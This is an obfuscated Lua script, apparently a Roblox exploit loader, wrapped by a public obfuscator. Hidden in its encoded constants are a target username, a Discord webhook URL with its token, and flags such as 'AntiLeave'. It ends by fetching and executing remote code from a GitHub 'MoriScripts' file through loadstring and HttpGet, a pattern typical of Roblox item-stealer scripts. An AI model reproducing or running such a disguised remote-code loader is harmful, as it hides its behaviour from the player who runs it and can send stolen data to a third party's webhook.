--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v66=0;while true do if (v66==0) then v19=v0(v3(v30,1,1));return "";end end else local v67=0;local v68;while true do if (v67==0) then v68=v2(v0(v30,16));if v19 then local v97=v5(v68,v19);v19=nil;return v97;else return v68;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v69=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v69-(v69%(932 -(857 + 12 + 62))) ;else local v70=568 -(367 + 201) ;local v71;while true do if (v70==((1804 -(282 + 595)) -(214 + 713))) then v71=((1638 -(1523 + 114)) + 1)^(v32-1) ;return (((v31%(v71 + v71))>=v71) and (1 + 0)) or 0 ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1067 -(68 + 997)) ;return (v36 * (1526 -(226 + 1044))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (12 -9) );v18=v18 + (121 -(32 + 85)) ;return (v40 * (16441815 + 335401)) + (v39 * (66493 -(892 + 65))) + (v38 * (57 + 199)) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=2 -1 ;local v44=(v20(v42,2 -1 ,450 -(44 + 386) ) * (((1489 -(998 + 488)) -1)^((48 + 10) -26))) + v41 ;local v45=v20(v42,371 -(87 + 263) ,211 -(67 + 113) );local v46=((v20(v42,24 + 8 )==(1 -0)) and  -1) or (2 -1) ;if (v45==(0 + 0)) then if (v44==(0 -0)) then return v46 * (0 + 0 + 0) ;else v45=953 -(802 + 150) ;v43=0 -0 ;end elseif (v45==(5511 -3464)) then return ((v44==(0 -0)) and (v46 * ((443 -((1188 -(201 + 571)) + 26))/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(440 + (1721 -(116 + 1022))) ) * (v43 + (v44/((2 + (0 -0))^(490 -(145 + 293))))) ;end local function v25(v47)local v48=0 + 0 ;local v49;local v50;while true do if (v48==(0 -0)) then v49=nil;if  not v47 then local v91=0 -0 ;while true do if (v91==0) then v47=v23();if (v47==(1423 -((1396 -(745 + 21)) + 793))) then return "";end break;end end end v48=3 -2 ;end if (v48==(862 -(814 + 16 + 29))) then return v6(v50);end if (v48==(9 -7)) then v50={};for v75=2 -1 , #v49 do v50[v75]=v2(v1(v3(v49,v75,v75)));end v48=1 + 2 ;end if (v48==(3 -2)) then v49=v3(v16,v18,(v18 + v47) -(1748 -(760 + 987)) );v18=v18 + v47 ;v48=(2 -1) + 1 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51==2) then v56=nil;v57=nil;v51=3;end if (v51~=3) then else v58=nil;while true do if (v52~=2) then else local v95=0;while true do if ((936 -(280 + 656))~=v95) then else for v103=1 -0 ,v23() do local v104=0;local v105;local v106;while true do if (v104==(2 -1)) then while true do if (v105==0) then v106=v21();if (v20(v106,1,1701 -(1419 + 281) )~=0) then else local v202=0 -0 ;local v203;local v204;local v205;local v206;while true do if (0==v202) then v203=74 -(71 + 3) ;v204=nil;v202=1;end if (v202~=(2 + 0)) then else while true do if (v203~=2) then else local v214=0 -0 ;local v215;while true do if (v214==(0 -0)) then v215=0;while true do if (v215==(242 -(187 + 54))) then v203=3;break;end if (v215==(780 -(162 + 618))) then local v226=0 + 0 ;while true do if (v226~=(0 + 0)) then else if (v20(v205,1 -0 ,1 -0 )==(1 + 0)) then v206[2]=v58[v206[2]];end if (v20(v205,1638 -(1373 + 263) ,2)==1) then v206[3]=v58[v206[1003 -(451 + 549) ]];end v226=1 + 0 ;end if (v226~=1) then else v215=1;break;end end end end break;end end end if (v203~=(0 -0)) then else local v216=0 -0 ;local v217;local v218;while true do if (v216==0) then v217=1384 -(746 + 638) ;v218=nil;v216=1 + 0 ;end if (v216==(1 -0)) then while true do if (v217~=(341 -(218 + 123))) then else v218=0;while true do if (v218==0) then v204=v20(v106,1583 -(1535 + 46) ,3 + 0 );v205=v20(v106,4,6);v218=1;end if (v218==1) then v203=1;break;end end break;end end break;end end end if (v203==(1 + 0)) then local v219=0;while true do if (v219==0) then local v224=0;local v225;while true do if ((560 -(306 + 254))==v224) then v225=0;while true do if (1==v225) then v219=1 + 0 ;break;end if (v225~=0) then else local v227=0;while true do if (v227~=(1 -0)) then else v225=1;break;end if (v227==0) then v206={v22(),v22(),nil,nil};if (v204==0) then local v232=0 + 0 ;local v233;while true do if (v232==(0 -0)) then v233=603 -(268 + 335) ;while true do if ((290 -(60 + 230))==v233) then v206[3]=v22();v206[576 -(426 + 146) ]=v22();break;end end break;end end elseif (v204==(1 + 0)) then v206[1459 -(282 + 1174) ]=v23();elseif (v204==2) then v206[3]=v23() -((813 -(569 + 242))^(46 -30)) ;elseif (v204==(1 + 2)) then local v238=0;local v239;while true do if (v238~=0) then else v239=1024 -(706 + 318) ;while true do if (v239==0) then v206[1254 -(721 + 530) ]=v23() -((1273 -(945 + 326))^16) ;v206[4]=v22();break;end end break;end end end v227=2 -1 ;end end end end break;end end end if (v219==(1 + 0)) then v203=702 -(271 + 429) ;break;end end end if (v203~=(3 + 0)) then else if (v20(v205,3,1503 -(1408 + 92) )~=(1087 -(461 + 625))) then else v206[4]=v58[v206[1292 -(993 + 295) ]];end v53[v103]=v206;break;end end break;end if (v202~=(1 + 0)) then else local v212=0;while true do if (v212==1) then v202=1173 -(418 + 753) ;break;end if (v212==(0 + 0)) then v205=nil;v206=nil;v212=1;end end end end end break;end end break;end if (0~=v104) then else v105=0 + 0 ;v106=nil;v104=1;end end end for v107=1 + 0 ,v23() do v54[v107-1 ]=v28();end v95=1 + 0 ;end if (v95==(530 -(406 + 123))) then return v56;end end end if (v52==1) then local v96=1769 -(1749 + 20) ;while true do if (v96==2) then v52=1 + 1 ;break;end if (v96~=1) then else for v109=1323 -(1249 + 73) ,v57 do local v110=0 + 0 ;local v111;local v112;local v113;local v114;while true do if (v110==(1147 -(466 + 679))) then while true do if (v111~=(2 -1)) then else v114=nil;while true do if (v112==1) then if (v113==(2 -1)) then v114=v21()~=(1900 -(106 + 1794)) ;elseif (v113==(1 + 1)) then v114=v24();elseif (v113==(1 + 2)) then v114=v25();end v58[v109]=v114;break;end if (v112==0) then local v208=0;local v209;while true do if (v208~=(0 -0)) then else v209=0 -0 ;while true do if (v209==1) then v112=1;break;end if (v209~=(114 -(4 + 110))) then else local v221=0;while true do if (v221==(585 -(57 + 527))) then v209=1;break;end if (v221~=(1427 -(41 + 1386))) then else v113=v21();v114=nil;v221=104 -(17 + 86) ;end end end end break;end end end end break;end if ((0 + 0)==v111) then local v145=0;local v146;while true do if (v145==(0 -0)) then v146=0 -0 ;while true do if (v146~=(167 -(122 + 44))) then else v111=1 -0 ;break;end if (v146==(0 -0)) then local v213=0 + 0 ;while true do if ((0 + 0)~=v213) then else v112=0;v113=nil;v213=1 -0 ;end if ((66 -(30 + 35))~=v213) then else v146=1 + 0 ;break;end end end end break;end end end end break;end if (v110==(1257 -(1043 + 214))) then v111=0 -0 ;v112=nil;v110=1;end if (v110==(1213 -(323 + 889))) then v113=nil;v114=nil;v110=5 -3 ;end end end v56[583 -(361 + 219) ]=v21();v96=2;end if (v96==0) then v57=v23();v58={};v96=1;end end end if (v52==0) then v53={};v54={};v55={};v56={v53,v54,nil,v55};v52=414 -(15 + 398) ;end end break;end if (v51==(983 -(18 + 964))) then v54=nil;v55=nil;v51=2;end if (v51==0) then v52=0 -0 ;v53=nil;v51=1;end end end local function v29(v59,v60,v61)local v62=0;local v63;local v64;local v65;while true do if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end if (v62==1) then v65=v59[3];return function(...)local v77=v63;local v78=v64;local v79=v65;local v80=v27;local v81=1;local v82= -1;local v83={};local v84={...};local v85=v12("#",...) -1 ;local v86={};local v87={};for v92=0,v85 do if (v92>=v79) then v83[v92-v79 ]=v84[v92 + 1 ];else v87[v92]=v84[v92 + 1 ];end end local v88=(v85-v79) + 1 ;local v89;local v90;while true do v89=v77[v81];v90=v89[1];if (v90<=5) then if (v90<=2) then if (v90<=0) then v87[v89[2]]=v89[3]~=0 ;elseif (v90>1) then v87[v89[2]]();else local v120=v89[2];local v121=v87[v89[3]];v87[v120 + 1 ]=v121;v87[v120]=v121[v89[4]];end elseif (v90<=3) then do return;end elseif (v90==4) then local v125=0;while true do if (v125==5) then v89=v77[v81];v87[v89[2]][v89[3]]=v89[4];v81=v81 + 1 ;v89=v77[v81];v125=6;end if (v125==1) then v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v89[3];v81=v81 + 1 ;v125=2;end if (v125==2) then v89=v77[v81];v61[v89[3]]=v87[v89[2]];v81=v81 + 1 ;v89=v77[v81];v125=3;end if (0==v125) then v87[v89[2]]=v89[3];v81=v81 + 1 ;v89=v77[v81];v61[v89[3]]=v87[v89[2]];v125=1;end if (v125==4) then v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v61[v89[3]];v81=v81 + 1 ;v125=5;end if (v125==3) then v87[v89[2]]=v89[3];v81=v81 + 1 ;v89=v77[v81];v61[v89[3]]=v87[v89[2]];v125=4;end if (v125==6) then v87[v89[2]]=v61[v89[3]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]][v89[3]]=v89[4];break;end end else local v126=0;local v127;local v128;local v129;local v130;local v131;while true do if (1==v126) then v87[v89[2]][v89[3]]=v89[4];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v61[v89[3]];v126=2;end if (v126==3) then v89=v77[v81];v131=v89[2];v130=v87[v89[3]];v87[v131 + 1 ]=v130;v126=4;end if (v126==0) then v127=nil;v128,v129=nil;v130=nil;v131=nil;v126=1;end if (v126==8) then v131=v89[2];v87[v131]=v87[v131](v13(v87,v131 + 1 ,v82));v81=v81 + 1 ;v89=v77[v81];v126=9;end if (5==v126) then v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v89[3]~=0 ;v81=v81 + 1 ;v126=6;end if (v126==6) then v89=v77[v81];v131=v89[2];v128,v129=v80(v87[v131](v13(v87,v131 + 1 ,v89[3])));v82=(v129 + v131) -1 ;v126=7;end if (v126==9) then v87[v89[2]]();v81=v81 + 1 ;v89=v77[v81];do return;end break;end if (2==v126) then v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v61[v89[3]];v81=v81 + 1 ;v126=3;end if (v126==7) then v127=0;for v200=v131,v82 do local v201=0;while true do if (v201==0) then v127=v127 + 1 ;v87[v200]=v128[v127];break;end end end v81=v81 + 1 ;v89=v77[v81];v126=8;end if (v126==4) then v87[v131]=v130[v89[4]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v89[3];v126=5;end end end elseif (v90<=8) then if (v90<=6) then v87[v89[2]]=v89[3];elseif (v90>7) then local v132=v89[2];local v133,v134=v80(v87[v132](v13(v87,v132 + 1 ,v89[3])));v82=(v134 + v132) -1 ;local v135=0;for v142=v132,v82 do v135=v135 + 1 ;v87[v142]=v133[v135];end else v87[v89[2]][v89[3]]=v89[4];end elseif (v90<=9) then v61[v89[3]]=v87[v89[2]];elseif (v90==10) then v87[v89[2]]=v61[v89[3]];else local v140=0;local v141;while true do if (v140==0) then v141=v89[2];v87[v141]=v87[v141](v13(v87,v141 + 1 ,v82));break;end end end v81=v81 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0E3O0003083O00557365724E616D6503103O006A757374616E6F726D616C6D616E2O3003073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31323833383938363731363439332O3037382F375574385F704E36325869585F6E3276373355655F6D4D4B72496C67463268674B707A6133634A65324447647146706F534A5A495A6F494D635F5254394F5841782D585403093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O0012043O00023O00124O00013O00124O00043O00124O00033O00124O00023O00124O00053O00124O00063O00304O0007000800124O00063O00304O0009000800120A3O00063O0030053O000A000800124O000B3O00122O0001000C3O00202O00010001000D00122O0003000E6O000400016O000100049O0000026O000100016O00017O00",v9(),...);end￼Enter
